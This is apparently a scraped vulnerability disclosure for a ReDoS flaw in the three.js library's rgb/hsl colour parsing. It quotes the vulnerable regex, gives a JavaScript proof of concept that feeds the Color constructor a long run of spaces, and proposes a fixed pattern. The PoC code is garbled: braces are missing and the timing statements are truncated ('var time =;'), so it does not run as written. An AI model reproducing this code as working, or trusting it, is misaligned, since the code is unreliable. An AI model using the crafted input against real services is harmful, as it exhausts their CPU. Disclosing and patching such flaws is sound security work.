ReDoS in three


I would like to report a Regular Expression Denial of Service (REDoS) vulnerability in three.

It allows cause a denial of service when handling rgb or hsl colors.

The vulnerable regex is located in

if ( m = /^((?:rgb|hsl)a?)\(\s*([^\)]*)\)/.exec( style ) ) {

To Reproduce

Steps to reproduce the behavior:


var three = require('three')

function build_blank (n) {
 var ret = "rgb("
 for (var i = 0; i < n; i++) {
  ret += " "

 return ret + "";

var Color = three.Color

var time =;
new Color(build_blank(50000))
var time_cost = - time;
console.log(time_cost+" ms")

I am willing to suggest that you replace the regex /^((?:rgb|hsl)a?)\(\s*([^\)]*)\)/ with /^((?:rgb|hsl)a?)\(\s*([^\)\s]*)\)/

1 possible answer(s) on “ReDoS in three